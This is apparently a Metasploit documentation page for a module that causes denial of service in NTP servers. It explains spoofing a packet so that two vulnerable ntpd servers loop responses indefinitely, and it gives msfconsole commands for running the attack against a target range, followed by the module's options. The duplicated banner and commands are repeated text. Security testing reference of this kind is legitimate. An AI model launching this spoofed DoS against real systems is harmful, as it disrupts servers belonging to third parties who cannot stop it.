NTP.org ntpd Reserved Mode Denial of Service
This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!
Rank
- Normal
Authors
- todb < todb [at] metasploit.com >
Vulnerability References
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/ntp/ntpd_reserved_dos
msf auxiliary(ntpd_reserved_dos) > set LHOST [MY IP ADDRESS]
msf auxiliary(ntpd_reserved_dos) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ntpd_reserved_dos) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/ntp/ntpd_reserved_dos
msf auxiliary(ntpd_reserved_dos) > set LHOST [MY IP ADDRESS]
msf auxiliary(ntpd_reserved_dos) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ntpd_reserved_dos) > run
Module Options
| INTERFACE | The name of the interface |
| LHOST | The spoofed address of a vulnerable ntpd server |
| RHOSTS | The target address range or CIDR identifier |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| THREADS | The number of concurrent threads (default: 1) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| ShowProgress | Display progress messages during a scan |
| ShowProgressPercent | The interval in percent that progress should be shown |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |